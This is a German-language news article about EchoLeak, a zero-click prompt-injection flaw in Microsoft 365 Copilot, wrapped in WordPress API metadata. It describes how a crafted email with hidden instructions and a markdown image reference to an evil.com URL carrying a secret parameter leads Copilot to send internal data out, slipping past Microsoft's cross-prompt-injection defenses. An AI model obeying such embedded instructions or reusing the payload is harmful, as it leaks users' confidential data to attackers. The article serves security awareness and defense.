{"id":3560,"date":"2025-06-16T12:30:04","date_gmt":"2025-06-16T12:30:04","guid":{"rendered":"https:\/\/cybersecurityinfocus.com\/?p=3560"},"modified":"2025-06-16T12:30:04","modified_gmt":"2025-06-16T12:30:04","slug":"erster-zero-click-angriff-auf-microsoft-365-copilot","status":"publish","type":"post","link":"https:\/\/cybersecurityinfocus.com\/?p=3560","title":{"rendered":"Erster Zero-Click-Angriff auf Microsoft 365 Copilot"},"content":{"rendered":"
\n
\n
\n
\n
<\/div>\n
Eine L\u00fccke in Microsoft 365 Copilot erm\u00f6glicht es, sensible Daten zu stehlen.\n

Tada Images \u2013 shutterstock.com<\/p>\n<\/div>\n

Stellen Sie sich einen Angriff vor, der so heimlich ist, dass er keine Klicks, keine Downloads und keine Warnungen erfordert \u2013 es reicht eine einzelne E-Mail, die in Ihrem Posteingang landet. Das ist der Fall bei EchoLeak, einer kritischen Sicherheitsl\u00fccke in Microsoft 365 Copilot<\/a>. Sie erm\u00f6glicht es Hackern, sensible Unternehmensdaten zu stehlen, ohne dass die Opfer auch nur einen Finger r\u00fchren.<\/p>\n

Die von Aim Security entdeckte Schwachstelle ist der erste dokumentierte Zero-Click-Angriff auf einen KI-Agenten. \u201eEine einzige manipulierte E-Mail reicht aus. Copilot verarbeitet sie unbemerkt, folgt versteckten Anweisungen, durchsucht interne Dateien und versendet vertrauliche Daten, w\u00e4hrend es die Sicherheitsvorkehrungen von Microsoft umgeht\u201c, erkl\u00e4ren die Sicherheitsspezialisten in ihrem Blogbeitrag<\/a>.<\/p>\n

\u201eDamit wird die Kernst\u00e4rke der KI, ihr Kontextverst\u00e4ndnis, gegen sich selbst instrumentalisiert\u201c, erg\u00e4nzt Abhishek Anant Garg, Analyst bei der QKS Group. \u201eDie Unternehmenssicherheit hat Schwierigkeiten, weil sie f\u00fcr b\u00f6sartigen Code ausgelegt ist und nicht f\u00fcr eine Sprache, die harmlos aussieht, sich aber wie eine Waffe verh\u00e4lt.\u201c<\/p>\n

Nader Henein, VP Analyst bei Gartner warnt: \u201eDiese Art von Schwachstelle stellt eine erhebliche Bedrohung dar. Angesichts der Komplexit\u00e4t von KI-Assistenten und RAG-basierten Diensten wird dies sicherlich nicht der letzte Fall sein, den wir sehen werden.\u201c<\/p>\n

Der Exploit-Mechanismus von EchoLeak<\/strong><\/h2>\n

EchoLeak nutzt die F\u00e4higkeit von Copilot, sowohl vertrauensw\u00fcrdige interne Daten (wie E-Mails, Teams-Chats und OneDrive-Dateien) als auch nicht vertrauensw\u00fcrdige externe Eingaben, wie eingehende E-Mails, zu verarbeiten. Der Angriff beginnt mit einer b\u00f6sartigen E-Mail, die eine bestimmte Markdown-Syntax enth\u00e4lt, \u201ewie ![Bild-Alt-Text][ref] [ref]: https:\/\/www.evil.com?param=<secret>\u201c.<\/p>\n

W\u00e4hrend Copilot die E-Mail automatisch im Hintergrund scannt, um sich auf Benutzeranfragen vorzubereiten, l\u00f6st der KI-Assistent eine Browseranfrage aus, die sensible Daten wie Chat-Verl\u00e4ufe, Benutzerdaten oder interne Dokumente an den Server eines Angreifers sendet.<\/p>\n

Die Exploit-Kette basiert auf mehreren Schwachstellen, darunter eine offene Weiterleitung in der Content Security Policy (CSP) von Microsoft, die Dom\u00e4nen von Teams und SharePoint vertraut. Dadurch k\u00f6nnen Angreifer b\u00f6sartige Anfragen als legitim tarnen und die Abwehrma\u00dfnahmen von Microsoft gegen Cross-Prompt-Injection-Angriffe (XPIA) umgehen.<\/p>\n

\u201eEchoLeak deckt die falsche Sicherheit von schrittweisen KI-Einf\u00fchrungen auf\u201c, so das Fazit der \u00a0Spezialisten von der QKS Group. Aim Security stuft diese Schwachstelle als \u201eLLM Scope Violation\u201c ein, bei der nicht vertrauensw\u00fcrdige Eingabeaufforderungen die KI dazu manipulieren, auf Daten au\u00dferhalb ihres vorgesehenen Bereichs zuzugreifen.<\/p>\n

\u201eAngreifer k\u00f6nnen auf Inhalte aus anderen Teilen des LLM-Kontexts verweisen, um sensible Informationen zu extrahieren und so die Synthesef\u00e4higkeit der KI in einen Vektor f\u00fcr die Datenexfiltration zu verwandeln\u201c, f\u00fcgt Garg hinzu.<\/p>\n

Die Forscher fanden dar\u00fcber hinaus \u00e4hnliche Schwachstellen, was darauf hindeutet, dass andere KI-Systeme, die dieselbe Technologie verwenden, ebenfalls gef\u00e4hrdet sein k\u00f6nnten. Microsoft <\/a>gab an, die Sicherheitsl\u00fccke behoben zu haben, und beteuerte, dass keine Kunden betroffen waren und es keine tats\u00e4chlichen Angriffe gegeben habe.<\/p>\n

Echos \u00fcber Microsoft hinaus<\/strong><\/h2>\n

\u201eEchoLeak markiert einen Wandel hin zu Architekturen, die von einer Kompromittierung ausgehen\u201c, betont der QKS Group-Experte. \u201eUnternehmen m\u00fcssen nun damit rechnen, dass feindliche Prompt-Injektionen auftreten werden, sodass eine Echtzeit-Verhaltens\u00fcberwachung und agentenbezogene Bedrohungsmodellierung zu existenziellen Anforderungen werden.\u201c<\/p>\n

Da KI aus dem Arbeitsalltag nicht mehr wegzudenken ist, fordern Analysten eine robuste Eingabevalidierung und Datenisolierung. Gartner-Analyst Henein warnte, dass gezielte Angriffe wie \u201edas Versenden einer E-Mail an einen CFO, um Verdienstangaben vor der Ver\u00f6ffentlichung zu stehlen\u201c besonders besorgniserregend sind.<\/p>\n

Jedes KI-System, das auf Retrieval-Augmented Generation<\/a> (RAG) basiert, k\u00f6nnte gef\u00e4hrdet sein, wenn es externe Eingaben zusammen mit sensiblen internen Daten verarbeitet. Laut Garg k\u00f6nnten herk\u00f6mmliche Abwehrma\u00dfnahmen wie DLP-Tags solche Angriffe oft nicht verhindern. \u201cZudem beeintr\u00e4chtigen sie m\u00f6glicherweise die Funktionalit\u00e4t von Copilot, wenn sie aktiviert sind\u201c, f\u00fcgt er hinzu.<\/p>\n

\u201eDie Schwachstelle beweist, dass herk\u00f6mmliche Perimeter bedeutungslos sind, wenn KI manipuliert werden kann, um durch scheinbar harmlose Eingaben Grenzen zu \u00fcberschreiten\u201c, mahnt der QKS-Group-Analyst.<\/p>\n

F\u00fcr Branchen wie das Bankwesen, die Gesundheitsbranche und die Verteidigung k\u00f6nnen diese Produktivit\u00e4tswerkzeuge gleichzeitig als leistungsstarke Exfiltrationsmechanismen dienen. \u201eCIOs m\u00fcssen KI-Systeme jetzt unter der Annahme einer feindlichen Autonomie entwickeln\u201c, fordert Garg. \u201eJeder Agent ist eine potenzielle Datenleckquelle und muss vor der Produktion einer Red-Team-Validierung unterzogen werden.\u201c<\/p>\n

KI-Sicherheit neu denken<\/strong><\/h2>\n

EchoLeak zeigt, dass KI f\u00fcr Unternehmen nicht immun gegen Kompromittierung ist und dass es bei ihrer Sicherung nicht nur darum geht, L\u00fccken zu stopfen. \u201eKI-Agenten erfordern ein neues Schutzparadigma\u201c, betont der QKS-Group-Experte. \u201eLaufzeitsicherheit muss der Mindeststandard sein.\u201c<\/p>\n

Die Schwachstelle offenbart auch tiefergehende strukturelle Probleme in der modernen KI. \u201eAgentic KI<\/a> leidet unter einem Kontextkollaps\u201c, f\u00fchrt Garg aus. \u201eSie vermischt Daten aus verschiedenen Sicherheitsdom\u00e4nen und kann nicht unterscheiden, worauf sie zugreifen kann und worauf sie zugreifen sollte, wodurch diese Synthese zu einer Privilegienausweitung f\u00fchrt.\u201c<\/p>\n

Angesichts der wachsenden Angriffsfl\u00e4che von KI beweist EchoLeak, dass selbst die ausgefeiltesten Systeme durch Ausnutzung der KI-eigenen Logik als Waffe eingesetzt werden k\u00f6nnen. \u201eVorerst\u201c, so Garg abschlie\u00dfend, \u201esollten CISOs ganz genau hinschauen und besser zweimal \u00fcberlegen, bevor sie der KI Zugriff auf ihren Posteingang gew\u00e4hren.\u201c (jm)<\/p>\n

Lesetipp: GenAI-Security als Checkliste<\/a><\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>","protected":false},"excerpt":{"rendered":"

Eine L\u00fccke in Microsoft 365 Copilot erm\u00f6glicht es, sensible Daten zu stehlen. Tada Images \u2013 shutterstock.com Stellen Sie sich einen Angriff vor, der so heimlich ist, dass er keine Klicks, keine Downloads und keine Warnungen erfordert \u2013 es reicht eine einzelne E-Mail, die in Ihrem Posteingang landet. Das ist der Fall bei EchoLeak, einer kritischen […]<\/p>\n","protected":false},"author":0,"featured_media":3561,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-3560","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-education"],"_links":{"self":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts\/3560"}],"collection":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"replies":[{"embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3560"}],"version-history":[{"count":0,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts\/3560\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/media\/3561"}],"wp:attachment":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3560"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3560"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3560"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}